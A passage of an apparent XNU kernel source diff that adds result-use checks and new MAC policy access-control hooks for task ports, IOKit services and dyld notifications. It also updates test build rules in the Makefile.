uid, gid_t gid); + uid_t uid, gid_t gid) __result_use_check; int mac_vnode_check_setutimes(vfs_context_t ctx, struct vnode *vp, - struct timespec atime, struct timespec mtime); + struct timespec atime, struct timespec mtime) __result_use_check; int mac_vnode_check_signature(struct vnode *vp, struct cs_blob *cs_blob, struct image_params *imgp, unsigned int *cs_flags, unsigned int *signer_type, - int flags, unsigned int platform); + int flags, unsigned int platform) __result_use_check; int mac_vnode_check_supplemental_signature(struct vnode *vp, struct cs_blob *cs_blob, struct vnode *linked_vp, - struct cs_blob *linked_cs_blob, unsigned int *signer_type); + struct cs_blob *linked_cs_blob, unsigned int *signer_type) __result_use_check; int mac_vnode_check_stat(vfs_context_t ctx, - kauth_cred_t file_cred, struct vnode *vp); + kauth_cred_t file_cred, struct vnode *vp) __result_use_check; #ifdef KERNEL_PRIVATE int mac_vnode_check_trigger_resolve(vfs_context_t ctx, struct vnode *dvp, - struct componentname *cnp); + struct componentname *cnp) __result_use_check; #endif int mac_vnode_check_truncate(vfs_context_t ctx, - kauth_cred_t file_cred, struct vnode *vp); + kauth_cred_t file_cred, struct vnode *vp) __result_use_check; int mac_vnode_check_uipc_bind(vfs_context_t ctx, struct vnode *dvp, - struct componentname *cnp, struct vnode_attr *vap); -int mac_vnode_check_uipc_connect(vfs_context_t ctx, struct vnode *vp, struct socket *so); + struct componentname *cnp, struct vnode_attr *vap) __result_use_check; +int mac_vnode_check_uipc_connect(vfs_context_t ctx, struct vnode *vp, struct socket *so) __result_use_check; int mac_vnode_check_unlink(vfs_context_t ctx, struct vnode *dvp, - struct vnode *vp, struct componentname *cnp); + struct vnode *vp, struct componentname *cnp) __result_use_check; int mac_vnode_check_write(vfs_context_t ctx, - kauth_cred_t file_cred, struct vnode *vp); + kauth_cred_t file_cred, struct vnode *vp) __result_use_check; struct label *mac_vnode_label_alloc(void); int mac_vnode_label_associate(struct mount *mp, struct vnode *vp, - vfs_context_t ctx); + vfs_context_t ctx) __result_use_check; void mac_vnode_label_associate_devfs(struct mount *mp, struct devnode *de, struct vnode *vp); -int mac_vnode_label_associate_extattr(struct mount *mp, struct vnode *vp); +int mac_vnode_label_associate_extattr(struct mount *mp, struct vnode *vp) __result_use_check; int mac_vnode_label_associate_fdesc(struct mount *mp, struct fdescnode *fnp, - struct vnode *vp, vfs_context_t ctx); + struct vnode *vp, vfs_context_t ctx) __result_use_check; void mac_vnode_label_associate_singlelabel(struct mount *mp, struct vnode *vp); void mac_vnode_label_copy(struct label *l1, struct label *l2); void mac_vnode_label_destroy(struct vnode *vp); -int mac_vnode_label_externalize_audit(struct vnode *vp, struct mac *mac); +int mac_vnode_label_externalize_audit(struct vnode *vp, struct mac *mac) __result_use_check; void mac_vnode_label_free(struct label *label); void mac_vnode_label_init(struct vnode *vp); -int mac_vnode_label_init_needed(struct vnode *vp); +int mac_vnode_label_init_needed(struct vnode *vp) __result_use_check; #ifdef KERNEL_PRIVATE struct label *mac_vnode_label_allocate(vnode_t vp); #endif @@ -524,7 +528,7 @@ void mac_vnode_label_update(vfs_context_t ctx, struct vnode *vp, void mac_vnode_label_update_extattr(struct mount *mp, struct vnode *vp, const char *name); int mac_vnode_notify_create(vfs_context_t ctx, struct mount *mp, - struct vnode *dvp, struct vnode *vp, struct componentname *cnp); + struct vnode *dvp, struct vnode *vp, struct componentname *cnp) __result_use_check; void mac_vnode_notify_deleteextattr(vfs_context_t ctx, struct vnode *vp, const char *name); void mac_vnode_notify_link(vfs_context_t ctx, struct vnode *vp, struct vnode *dvp, struct componentname *cnp); @@ -539,17 +543,17 @@ void mac_vnode_notify_setmode(vfs_context_t ctx, struct vnode *vp, mode_t mod void mac_vnode_notify_setowner(vfs_context_t ctx, struct vnode *vp, uid_t uid, gid_t gid); void mac_vnode_notify_setutimes(vfs_context_t ctx, struct vnode *vp, struct timespec atime, struct timespec mtime); void mac_vnode_notify_truncate(vfs_context_t ctx, kauth_cred_t file_cred, struct vnode *vp); -int mac_vnode_find_sigs(struct proc *p, struct vnode *vp, off_t offsetInMacho); +int mac_vnode_find_sigs(struct proc *p, struct vnode *vp, off_t offsetInMacho) __result_use_check; int vnode_label(struct mount *mp, struct vnode *dvp, struct vnode *vp, - struct componentname *cnp, int flags, vfs_context_t ctx); + struct componentname *cnp, int flags, vfs_context_t ctx) __result_use_check; void vnode_relabel(struct vnode *vp); void mac_pty_notify_grant(proc_t p, struct tty *tp, dev_t dev, struct label *label); void mac_pty_notify_close(proc_t p, struct tty *tp, dev_t dev, struct label *label); -int mac_kext_check_load(kauth_cred_t cred, const char *identifier); -int mac_kext_check_unload(kauth_cred_t cred, const char *identifier); -int mac_kext_check_query(kauth_cred_t cred); -int mac_skywalk_flow_check_connect(proc_t p, void *flow, const struct sockaddr *addr, int type, int protocol); -int mac_skywalk_flow_check_listen(proc_t p, void *flow, const struct sockaddr *addr, int type, int protocol); +int mac_kext_check_load(kauth_cred_t cred, const char *identifier) __result_use_check; +int mac_kext_check_unload(kauth_cred_t cred, const char *identifier) __result_use_check; +int mac_kext_check_query(kauth_cred_t cred) __result_use_check; +int mac_skywalk_flow_check_connect(proc_t p, void *flow, const struct sockaddr *addr, int type, int protocol) __result_use_check; +int mac_skywalk_flow_check_listen(proc_t p, void *flow, const struct sockaddr *addr, int type, int protocol) __result_use_check; void mac_vnode_notify_reclaim(vnode_t vp); void psem_label_associate(struct fileproc *fp, struct vnode *vp, struct vfs_context *ctx); diff --git a/security/mac_iokit.c b/security/mac_iokit.c index fe1f43ac0..a6946e80b 100644 --- a/security/mac_iokit.c +++ b/security/mac_iokit.c @@ -64,6 +64,15 @@ #include #include +int +mac_iokit_check_open_service(kauth_cred_t cred, io_object_t service, unsigned int user_client_type) +{ + int error; + + MAC_CHECK(iokit_check_open_service, cred, service, user_client_type); + return error; +} + int mac_iokit_check_open(kauth_cred_t cred, io_object_t user_client, unsigned int user_client_type) { diff --git a/security/mac_mach.c b/security/mac_mach.c index 4739336fb..a1bb852f3 100644 --- a/security/mac_mach.c +++ b/security/mac_mach.c @@ -75,10 +75,12 @@ mac_task_get_proc(struct task *task) } int -mac_task_check_expose_task(struct task *task) +mac_task_check_expose_task(struct task *task, mach_task_flavor_t flavor) { int error; + assert(flavor <= TASK_FLAVOR_NAME); + struct proc *p = mac_task_get_proc(task); if (p == NULL) { return ESRCH; @@ -87,7 +89,51 @@ mac_task_check_expose_task(struct task *task) struct ucred *cred = kauth_cred_get(); proc_rele(p); - MAC_CHECK(proc_check_expose_task, cred, &pident); + + /* Also call the old hook for compatability, deprecating in rdar://66356944. */ + if (flavor == TASK_FLAVOR_CONTROL) { + MAC_CHECK(proc_check_expose_task, cred, &pident); + if (error) { + return error; + } + } + + MAC_CHECK(proc_check_expose_task_with_flavor, cred, &pident, flavor); + + return error; +} + +int +mac_task_check_task_id_token_get_task(struct task *task, mach_task_flavor_t flavor) +{ + int error; + + assert(flavor <= TASK_FLAVOR_NAME); + + struct proc *p = mac_task_get_proc(task); + if (p == NULL) { + return ESRCH; + } + struct proc_ident pident = proc_ident(p); + + proc_rele(p); + + p = current_proc(); + kauth_cred_t cred = kauth_cred_proc_ref(p); + MAC_CHECK(proc_check_task_id_token_get_task, cred, &pident, flavor); + kauth_cred_unref(&cred); + return error; +} + +int +mac_task_check_get_movable_control_port(void) +{ + int error; + struct proc *p = current_proc(); + + kauth_cred_t cred = kauth_cred_proc_ref(p); + MAC_CHECK(proc_check_get_movable_control_port, cred); + kauth_cred_unref(&cred); return error; } @@ -125,6 +171,18 @@ mac_task_check_set_host_exception_port(struct task *task, unsigned int exception return error; } +int +mac_task_check_dyld_process_info_notify_register(void) +{ + int error; + struct proc *p = current_proc(); + + kauth_cred_t cred = kauth_cred_proc_ref(p); + MAC_CHECK(proc_check_dyld_process_info_notify_register, cred); + kauth_cred_unref(&cred); + return error; +} + int mac_task_check_set_host_exception_ports(struct task *task, unsigned int exception_mask) { diff --git a/security/mac_mach_internal.h b/security/mac_mach_internal.h index 3e716ebd6..ba59e1b84 100644 --- a/security/mac_mach_internal.h +++ b/security/mac_mach_internal.h @@ -74,14 +74,16 @@ void mac_policy_init(void); void mac_policy_initmach(void); /* tasks */ -int mac_task_check_expose_task(struct task *t); - +int mac_task_check_expose_task(struct task *t, mach_task_flavor_t flavor); +int mac_task_check_task_id_token_get_task(struct task *t, mach_task_flavor_t flavor); int mac_task_check_set_host_special_port(struct task *task, int id, struct ipc_port *port); int mac_task_check_set_host_exception_port(struct task *task, unsigned int exception); int mac_task_check_set_host_exception_ports(struct task *task, unsigned int exception_mask); +int mac_task_check_get_movable_control_port(void); +int mac_task_check_dyld_process_info_notify_register(void); /* See rdar://problem/58989880 */ #ifndef bitstr_test @@ -92,7 +94,7 @@ typedef int (*mac_task_mach_filter_cbfunc_t)(struct proc *bsdinfo, int num); typedef int (*mac_task_kobj_filter_cbfunc_t)(struct proc *bsdinfo, int msgid, int index); extern mac_task_mach_filter_cbfunc_t mac_task_mach_trap_evaluate; extern mac_task_kobj_filter_cbfunc_t mac_task_kobj_msg_evaluate; -extern int mach_trap_count; +extern const int mach_trap_count; extern int mach_kobj_count; void mac_task_set_mach_filter_mask(struct task *task, uint8_t *maskptr); diff --git a/security/mac_policy.h b/security/mac_policy.h index 08adb58fb..cd87e7862 100644 --- a/security/mac_policy.h +++ b/security/mac_policy.h @@ -1059,7 +1059,8 @@ typedef void mpo_file_label_init_t( * * Determine whether the subject identified by the credential can open an * I/O Kit device at the passed path of the passed user client class and - * type. + * type. This check is performed after instantiating the user client. + * See also mpo_iokit_check_open_service_t. * * @return Return 0 if access is granted, or an appropriate value for * errno should be returned. @@ -1069,6 +1070,25 @@ typedef int mpo_iokit_check_open_t( io_object_t user_client, unsigned int user_client_type ); +/** + * @brief Access control check for opening an I/O Kit device + * @param cred Subject credential + * @param service Service instance + * @param user_client_type User client type + * + * Determine whether the subject identified by the credential can open a + * I/O Kit user client of the passed service and user client type. + * This check is performed before instantiating the user client. See also + * mpo_iokit_check_open_t. + * + * @return Return 0 if access is granted, or an appropriate value for + * errno should be returned. + */ +typedef int mpo_iokit_check_open_service_t( + kauth_cred_t cred, + io_object_t service, + unsigned int user_client_type + ); /** * @brief Access control check for setting I/O Kit device properties * @param cred Subject credential @@ -2152,6 +2172,27 @@ typedef int mpo_proc_check_set_host_exception_port_t( kauth_cred_t cred, unsigned int exception ); +/** + * @brief Access control check for getting movable task/thread control port for current task. + * @param cred Subject credential + * + * @return Return 0 if access is granted, otherwise an appropriate value for + * errno should be returned. + */ +typedef int mpo_proc_check_get_movable_control_port_t( + kauth_cred_t cred + ); +/** + * @brief Access control check for calling task_dyld_process_info_notify_register + * and task_dyld_process_info_notify_deregister. + * @param cred Subject credential + * + * @return Return 0 if access is granted, otherwise an appropriate value for + * errno should be returned. + */ +typedef int mpo_proc_check_dyld_process_info_notify_register_t( + kauth_cred_t cred + ); /** * @brief Access control over pid_suspend, pid_resume and family * @param cred Subject credential @@ -3494,6 +3535,26 @@ typedef int mpo_proc_check_get_task_t( struct proc_ident *pident ); +/** + * @brief Access control check for getting a process's task ports of different flavors + * @param cred Subject credential + * @param pident Object unique process identifier + * @param flavor Requested task port flavor + * + * Determine whether the subject identified by the credential can get + * the passed process's task port of given flavor. + * This call is used by the task_{,read,inspect,name}_for_pid(2) API. + * + * @return Return 0 if access is granted, otherwise an appropriate value for + * errno should be returned. Suggested failure: EACCES for label mismatch, + * EPERM for lack of privilege, or ESRCH to hide visibility of the target. + */ +typedef int mpo_proc_check_get_task_with_flavor_t( + kauth_cred_t cred, + struct proc_ident *pident, + mach_task_flavor_t flavor + ); + /** * @brief Access control check for exposing a process's task port * @param cred Subject credential @@ -3513,6 +3574,47 @@ typedef int mpo_proc_check_expose_task_t( struct proc_ident *pident ); +/** + * @brief Access control check for exposing a process's task ports of different flavors + * @param cred Subject credential + * @param pident Object unique process identifier + * @param flavor Requested task port flavor + * + * Determine whether the subject identified by the credential can expose + * the passed process's task port of given flavor. + * This call is used by the accessor APIs like processor_set_tasks() and + * processor_set_threads(). + * + * @return Return 0 if access is granted, otherwise an appropriate value for + * errno should be returned. Suggested failure: EACCES for label mismatch, + * EPERM for lack of privilege, or ESRCH to hide visibility of the target. + */ +typedef int mpo_proc_check_expose_task_with_flavor_t( + kauth_cred_t cred, + struct proc_ident *pident, + mach_task_flavor_t flavor + ); + +/** + * @brief Access control check for upgrading to task port with a task identity token + * @param cred Subject credential + * @param pident Object unique process identifier + * @param flavor Requested task port flavor + * + * Determine whether the subject identified by the credential can upgrade to task port + * of given flavor with a task identity token of the passed process. + * This call is used by task_identity_token_get_task_port(). + * + * @return Return 0 if access is granted, otherwise an appropriate value for + * errno should be returned. Suggested failure: EACCES for label mismatch, + * EPERM for lack of privilege, or ESRCH to hide visibility of the target. + */ +typedef int mpo_proc_check_task_id_token_get_task_t( + kauth_cred_t cred, + struct proc_ident *pident, + mach_task_flavor_t flavor + ); + /** * @brief Check whether task's IPC may inherit across process exec * @param p current process instance @@ -5342,7 +5444,7 @@ typedef void mpo_reserved_hook_t(void); * Please note that this should be kept in sync with the check assumptions * policy in bsd/kern/policy_check.c (policy_ops struct). */ -#define MAC_POLICY_OPS_VERSION 69 /* inc when new reserved slots are taken */ +#define MAC_POLICY_OPS_VERSION 74 /* inc when new reserved slots are taken */ struct mac_policy_ops { mpo_audit_check_postselect_t *mpo_audit_check_postselect; mpo_audit_check_preselect_t *mpo_audit_check_preselect; @@ -5450,9 +5552,9 @@ struct mac_policy_ops { mpo_mount_label_init_t *mpo_mount_label_init; mpo_mount_label_internalize_t *mpo_mount_label_internalize; - mpo_reserved_hook_t *mpo_reserved38; - mpo_reserved_hook_t *mpo_reserved39; - mpo_reserved_hook_t *mpo_reserved40; + mpo_proc_check_expose_task_with_flavor_t *mpo_proc_check_expose_task_with_flavor; + mpo_proc_check_get_task_with_flavor_t *mpo_proc_check_get_task_with_flavor; + mpo_proc_check_task_id_token_get_task_t *mpo_proc_check_task_id_token_get_task; mpo_pipe_check_ioctl_t *mpo_pipe_check_ioctl; mpo_pipe_check_kqfilter_t *mpo_pipe_check_kqfilter; @@ -5481,7 +5583,7 @@ struct mac_policy_ops { mpo_proc_notify_exec_complete_t *mpo_proc_notify_exec_complete; mpo_proc_notify_cs_invalidated_t *mpo_proc_notify_cs_invalidated; mpo_proc_check_syscall_unix_t *mpo_proc_check_syscall_unix; - mpo_proc_check_expose_task_t *mpo_proc_check_expose_task; + mpo_proc_check_expose_task_t *mpo_proc_check_expose_task; /* Deprecating, use mpo_proc_check_expose_task_with_flavor instead */ mpo_proc_check_set_host_special_port_t *mpo_proc_check_set_host_special_port; mpo_proc_check_set_host_exception_port_t *mpo_proc_check_set_host_exception_port; mpo_exc_action_check_exception_send_t *mpo_exc_action_check_exception_send; @@ -5518,8 +5620,8 @@ struct mac_policy_ops { mpo_proc_check_debug_t *mpo_proc_check_debug; mpo_proc_check_fork_t *mpo_proc_check_fork; - mpo_proc_check_get_task_name_t *mpo_proc_check_get_task_name; - mpo_proc_check_get_task_t *mpo_proc_check_get_task; + mpo_proc_check_get_task_name_t *mpo_proc_check_get_task_name; /* Deprecating, use mpo_proc_check_get_task_with_flavor instead */ + mpo_proc_check_get_task_t *mpo_proc_check_get_task; /* Deprecating, use mpo_proc_check_get_task_with_flavor instead */ mpo_proc_check_getaudit_t *mpo_proc_check_getaudit; mpo_proc_check_getauid_t *mpo_proc_check_getauid; mpo_proc_check_getlcid_t *mpo_proc_check_getlcid; @@ -5550,8 +5652,8 @@ struct mac_policy_ops { mpo_socket_check_setsockopt_t *mpo_socket_check_setsockopt; mpo_socket_check_getsockopt_t *mpo_socket_check_getsockopt; - mpo_reserved_hook_t *mpo_reserved50; - mpo_reserved_hook_t *mpo_reserved51; + mpo_proc_check_get_movable_control_port_t *mpo_proc_check_get_movable_control_port; + mpo_proc_check_dyld_process_info_notify_register_t *mpo_proc_check_dyld_process_info_notify_register; mpo_reserved_hook_t *mpo_reserved52; mpo_reserved_hook_t *mpo_reserved53; mpo_reserved_hook_t *mpo_reserved54; @@ -5562,7 +5664,8 @@ struct mac_policy_ops { mpo_reserved_hook_t *mpo_reserved59; mpo_reserved_hook_t *mpo_reserved60; mpo_reserved_hook_t *mpo_reserved61; - mpo_reserved_hook_t *mpo_reserved62; + + mpo_iokit_check_open_service_t *mpo_iokit_check_open_service; mpo_system_check_acct_t *mpo_system_check_acct; mpo_system_check_audit_t *mpo_system_check_audit; diff --git a/security/mac_process.c b/security/mac_process.c index 3bcb1cba5..09aa47db2 100644 --- a/security/mac_process.c +++ b/security/mac_process.c @@ -75,6 +75,8 @@ #include #include +#include + #include #include @@ -106,10 +108,38 @@ mac_cred_label_free(struct label *label) mac_labelzone_free(label); } -int -mac_cred_label_compare(struct label *a, struct label *b) +bool +mac_cred_label_is_equal(const struct label *a, const struct label *b) +{ + if (a->l_flags != b->l_flags) { + return false; + } + for (int slot = 0; slot < MAC_MAX_SLOTS; slot++) { + const void *pa = a->l_perpolicy[slot].l_ptr; + const void *pb = b->l_perpolicy[slot].l_ptr; + + if (pa != pb) { + return false; + } + } + return true; +} + +uint32_t +mac_cred_label_hash_update(const struct label *a, uint32_t hash) { - return bcmp(a, b, sizeof(*a)) == 0; + hash = os_hash_jenkins_update(&a->l_flags, + sizeof(a->l_flags), hash); +#if __has_feature(ptrauth_calls) + for (int slot = 0; slot < MAC_MAX_SLOTS; slot++) { + const void *ptr = a->l_perpolicy[slot].l_ptr; + hash = os_hash_jenkins_update(&ptr, sizeof(ptr), hash); + } +#else + hash = os_hash_jenkins_update(&a->l_perpolicy, + sizeof(a->l_perpolicy), hash); +#endif + return hash; } int @@ -410,31 +440,48 @@ mac_proc_check_fork(proc_t curp) } int -mac_proc_check_get_task_name(struct ucred *cred, proc_ident_t pident) +mac_proc_check_get_task(struct ucred *cred, proc_ident_t pident, mach_task_flavor_t flavor) { int error; - MAC_CHECK(proc_check_get_task_name, cred, pident); + assert(flavor <= TASK_FLAVOR_NAME); - return error; -} + /* Also call the old hook for compatability, deprecating in rdar://66356944. */ + if (flavor == TASK_FLAVOR_CONTROL) { + MAC_CHECK(proc_check_get_task, cred, pident); + if (error) { + return error; + } + } -int -mac_proc_check_get_task(struct ucred *cred, proc_ident_t pident) -{ - int error; + if (flavor == TASK_FLAVOR_NAME) { + MAC_CHECK(proc_check_get_task_name, cred, pident); + if (error) { + return error; + } + } - MAC_CHECK(proc_check_get_task, cred, pident); + MAC_CHECK(proc_check_get_task_with_flavor, cred, pident, flavor); return error; } int -mac_proc_check_expose_task(struct ucred *cred, proc_ident_t pident) +mac_proc_check_expose_task(struct ucred *cred, proc_ident_t pident, mach_task_flavor_t flavor) { int error; - MAC_CHECK(proc_check_expose_task, cred, pident); + assert(flavor <= TASK_FLAVOR_NAME); + + /* Also call the old hook for compatability, deprecating in rdar://66356944. */ + if (flavor == TASK_FLAVOR_CONTROL) { + MAC_CHECK(proc_check_expose_task, cred, pident); + if (error) { + return error; + } + } + + MAC_CHECK(proc_check_expose_task_with_flavor, cred, pident, flavor); return error; } diff --git a/tests/Makefile b/tests/Makefile index 71a3e46a2..c9d3909bb 100644 --- a/tests/Makefile +++ b/tests/Makefile @@ -74,18 +74,33 @@ install-sr_entitlement_helper: sr_entitlement_helper sr_entitlement: OTHER_LDFLAGS += -ldarwintest_utils +restrict_jit: CODE_SIGN_ENTITLEMENTS = restrict_jit.entitlements + backtracing: OTHER_LDFLAGS += -framework CoreSymbolication backtracing: CODE_SIGN_ENTITLEMENTS = kernel_symbolication_entitlements.plist data_protection: OTHER_LDFLAGS += -ldarwintest_utils -framework IOKit +CUSTOM_TARGETS += immovable_send_client vm_spawn_tool + +exception_tests: excserver exc_helpers.c +exception_tests: CODE_SIGN_ENTITLEMENTS = exception_tests.entitlements +exception_tests: OTHER_CFLAGS += $(OBJROOT)/excserver.c +exception_tests: OTHER_CFLAGS += -I $(OBJROOT) +exception_tests: OTHER_CFLAGS += -DENTITLED=1 + immovable_send: excserver immovable_send: OTHER_CFLAGS += $(OBJROOT)/excserver.c -I $(OBJROOT) immovable_send: OTHER_LDFLAGS += -ldarwintest_utils -lpthread -framework IOKit - -CUSTOM_TARGETS += immovable_send_client vm_spawn_tool inspect_port_nocodesign immovable_send: immovable_send_client +immovable_send_client: immovable_send_client.c + $(CC) $(DT_CFLAGS) -I $(OBJROOT) $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) immovable_send_client.c -o $(SYMROOT)/immovable_send_client + +install-immovable_send_client: immovable_send_client + mkdir -p $(INSTALLDIR) + cp $(SYMROOT)/immovable_send_client $(INSTALLDIR)/ + vm_spawn_tool: INVALID_ARCHS = i386 vm_spawn_tool: vm_spawn_tool.c $(CC) $(DT_CFLAGS) -I $(OBJROOT) $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) vm_spawn_tool.c -o $(SYMROOT)/vm_spawn_tool @@ -94,27 +109,30 @@ install-vm_spawn_tool: vm_spawn_tool mkdir -p $(INSTALLDIR)/tools cp $(SYMROOT)/vm_spawn_tool $(INSTALLDIR)/tools/ -immovable_send_client: immovable_send_client.c - $(CC) $(DT_CFLAGS) -I $(OBJROOT) $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) immovable_send_client.c -o $(SYMROOT)/immovable_send_client +CUSTOM_TARGETS += imm_pinned_control_port_crasher -install-immovable_send_client: immovable_send_client - mkdir -p $(INSTALLDIR) - cp $(SYMROOT)/immovable_send_client $(INSTALLDIR)/ +imm_pinned_control_port: excserver +imm_pinned_control_port: CODE_SIGN_ENTITLEMENTS = task_for_pid_entitlement.plist +imm_pinned_control_port: OTHER_CFLAGS += $(OBJROOT)/excserver.c -I $(OBJROOT) +imm_pinned_control_port: OTHER_LDFLAGS += -ldarwintest_utils -lpthread +imm_pinned_control_port: imm_pinned_control_port_crasher -inspect_port_nocodesign: inspect_port.c - $(CC) $(DT_CFLAGS) -I $(OBJROOT) -DT_NOCODESIGN=1 $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) $^ -o $(SYMROOT)/inspect_port_nocodesign - -install-inspect_port_nocodesign: inspect_port_nocodesign +imm_pinned_control_port_crasher: imm_pinned_control_port_crasher.c + $(CC) $(DT_CFLAGS) -I $(OBJROOT) $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) imm_pinned_control_port_crasher.c -o $(SYMROOT)/imm_pinned_control_port_crasher + $(CODESIGN) --force --sign - --timestamp=none $(SYMROOT)/$@ + +install-imm_pinned_control_port_crasher: imm_pinned_control_port_crasher mkdir -p $(INSTALLDIR) - env CODESIGN_ALLOCATE=$(CODESIGN_ALLOCATE) $(CODESIGN_ALLOCATE) -r -i $(SYMROOT)/inspect_port_nocodesign -o $(SYMROOT)/inspect_port_nocodesign + cp $(SYMROOT)/imm_pinned_control_port_crasher $(INSTALLDIR)/ kas_info: OTHER_LDFLAGS += -framework CoreSymbolication kas_info: CODE_SIGN_ENTITLEMENTS = kernel_symbolication_entitlements.plist kdebug: INVALID_ARCHS = i386 kdebug: OTHER_LDFLAGS = -framework ktrace -ldarwintest_utils -framework kperf +kdebug: OTHER_CFLAGS += test_utils.c -EXCLUDED_SOURCES += drop_priv.c kperf_helpers.c xnu_quick_test_helpers.c memorystatus_assertion_helpers.c bpflib.c in_cksum.c +EXCLUDED_SOURCES += drop_priv.c kperf_helpers.c xnu_quick_test_helpers.c memorystatus_assertion_helpers.c bpflib.c in_cksum.c test_utils.c ifneq ($(PLATFORM),iPhoneOS) EXCLUDED_SOURCES += jumbo_va_spaces_28530648.c perf_compressor.c memorystatus_freeze_test.c vm/entitlement_increased_memory_limit.c @@ -131,6 +149,8 @@ memorystatus_freeze_test: OTHER_CFLAGS += -ldarwintest_utils memorystatus_assert memorystatus_is_assertion: OTHER_LDFLAGS += -ldarwintest_utils memorystatus_is_assertion: OTHER_CFLAGS += memorystatus_assertion_helpers.c +memorystatus_vm_map_fork: OTHER_CFLAGS += test_utils.c + shared_cache_tests: OTHER_LDFLAGS += -ldarwintest_utils stackshot_tests: OTHER_CFLAGS += -Wno-objc-messaging-id @@ -179,6 +199,17 @@ kperf_backtracing: OTHER_LDFLAGS += -framework kperf -framework kperfdata -frame kperf_backtracing: OTHER_LDFLAGS += -framework CoreSymbolication kperf_backtracing: CODE_SIGN_ENTITLEMENTS = kernel_symbolication_entitlements.plist +text_corruption: OTHER_LDFLAGS += -ldarwintest_utils +CUSTOM_TARGETS += text_corruption_helper + +text_corruption_helper: + $(CC) $(LDFLAGS) $(CFLAGS) text_corruption_helper.c -lm -o $(SYMROOT)/$@; + env CODESIGN_ALLOCATE=$(CODESIGN_ALLOCATE) $(CODESIGN) --force --sign - --timestamp=none $(SYMROOT)/$@; + +install-text_corruption_helper: + mkdir -p $(INSTALLDIR) + cp $(SYMROOT)/text_corruption_helper $(INSTALLDIR)/ + kevent_qos: OTHER_CFLAGS += -Wno-unused-macros kevent_qos: OTHER_CFLAGS += -I $(OBJROOT)/ @@ -252,11 +283,12 @@ osptr_17: osptr_compat.cpp $(CXX) $(DT_CXXFLAGS) $(OTHER_CXXFLAGS) $(CXXFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) $< -o $(SYMROOT)/$@ priority_queue: OTHER_CXXFLAGS += -std=c++17 +zalloc_buddy: OTHER_CFLAGS += -Wno-format-pedantic os_refcnt: OTHER_CFLAGS += -I$(SRCROOT)/../libkern/ -Wno-gcc-compat -Wno-undef -O3 -flto -task_inspect: CODE_SIGN_ENTITLEMENTS = task_inspect.entitlements -task_inspect: OTHER_CFLAGS += -DENTITLED=1 +kernel_inspection: CODE_SIGN_ENTITLEMENTS = ./task_for_pid_entitlement.plist +kernel_inspection: OTHER_CFLAGS += -DENTITLED=1 turnstile_multihop: OTHER_CFLAGS += -Wno-unused-macros turnstile_multihop: OTHER_CFLAGS += -I $(OBJROOT)/ @@ -286,8 +318,6 @@ $(DSTROOT)/usr/local/bin/kcdata: $(SRCROOT)/../tools/lldbmacros/kcdata.py xnu_quick_test: OTHER_CFLAGS += xnu_quick_test_helpers.c -xnu_quick_test_entitled: CODE_SIGN_ENTITLEMENTS = xnu_quick_test.entitlements - CUSTOM_TARGETS += vm_set_max_addr_helper vm_set_max_addr_helper: vm_set_max_addr_helper.c @@ -377,7 +407,7 @@ endif task_info_28439149: CODE_SIGN_ENTITLEMENTS = ./task_for_pid_entitlement.plist -inspect_port: CODE_SIGN_ENTITLEMENTS = ./task_for_pid_entitlement.plist +read_inspect: CODE_SIGN_ENTITLEMENTS = ./task_for_pid_entitlement.plist proc_info: CODE_SIGN_ENTITLEMENTS = ./task_for_pid_entitlement.plist proc_info: OTHER_LDFLAGS += -ldarwintest_utils @@ -407,6 +437,9 @@ settimeofday_29193041_entitled: OTHER_CFLAGS += drop_priv.c thread_group_set_32261625: OTHER_LDFLAGS = -framework ktrace task_info: CODE_SIGN_ENTITLEMENTS = task_for_pid_entitlement.plist +task_info: OTHER_CFLAGS += test_utils.c + +extract_right_soft_fail: CODE_SIGN_ENTITLEMENTS = task_for_pid_entitlement.plist ifneq ($(PLATFORM),iPhoneOS) EXCLUDED_SOURCES += task_vm_info_decompressions.c @@ -496,6 +529,7 @@ debug_control_port_for_pid: CODE_SIGN_ENTITLEMENTS = ./debug_control_port_for_pi prng: OTHER_LDFLAGS += -ldarwintest_utils preoslog: OTHER_LDFLAGS += -ldarwintest_utils +preoslog: OTHER_CFLAGS += test_utils.c task_policy: CODE_SIGN_ENTITLEMENTS = ./task_policy_entitlement.plist @@ -560,12 +594,14 @@ ifeq ($(PLATFORM),MacOSX) EXCLUDED_SOURCES += vm/kern_max_task_pmem.c endif -EXCLUDED_SOURCES += vm/perf_helpers.c +EXCLUDED_SOURCES += benchmark/helpers.c + +perf_vmfault: OTHER_CFLAGS += benchmark/helpers.c fault_throughput: vm/fault_throughput.c mkdir -p $(SYMROOT)/vm $(CC) $(DT_CFLAGS) $(OTHER_CFLAGS) $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) $< -o $(SYMROOT)/vm/$@ -fault_throughput: OTHER_CFLAGS += vm/perf_helpers.c +fault_throughput: OTHER_CFLAGS += benchmark/helpers.c install-fault_throughput: fault_throughput mkdir -p $(INSTALLDIR)/vm @@ -589,7 +625,7 @@ EXCLUDED_SOURCES += vm/fault_throughput.plist vm/fault_throughput.c perf_madvise: vm/perf_madvise.c mkdir -p $(SYMROOT)/vm $(CC) $(DT_CFLAGS) $(OTHER_CFLAGS) $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) $< -o $(SYMROOT)/vm/$@ -perf_madvise: OTHER_CFLAGS += vm/perf_helpers.c +perf_madvise: OTHER_CFLAGS += benchmark/helpers.c install-perf_madvise: perf_madvise mkdir -p $(INSTALLDIR)/vm cp $(SYMROOT)/vm/perf_madvise $(INSTALLDIR)/vm/ @@ -612,13 +648,6 @@ task_create_suid_cred_unentitled: OTHER_CFLAGS += -DUNENTITLED task_create_suid_cred_unentitled: task_create_suid_cred.c $(CC) $(DT_CFLAGS) $(OTHER_CFLAGS) $(CFLAGS) $(DT_LDFLAGS) $(OTHER_LDFLAGS) $(LDFLAGS) $< -o $(SYMROOT)/$@ -ifeq ($(PLATFORM),MacOSX) -test_dext_launch_56101852: OTHER_LDFLAGS += -framework CoreFoundation -framework IOKit -test_dext_launch_56101852: CODE_SIGN_ENTITLEMENTS += test_dext_launch_56101852.entitlements -else -EXCLUDED_SOURCES += test_dext_launch_56101852.c 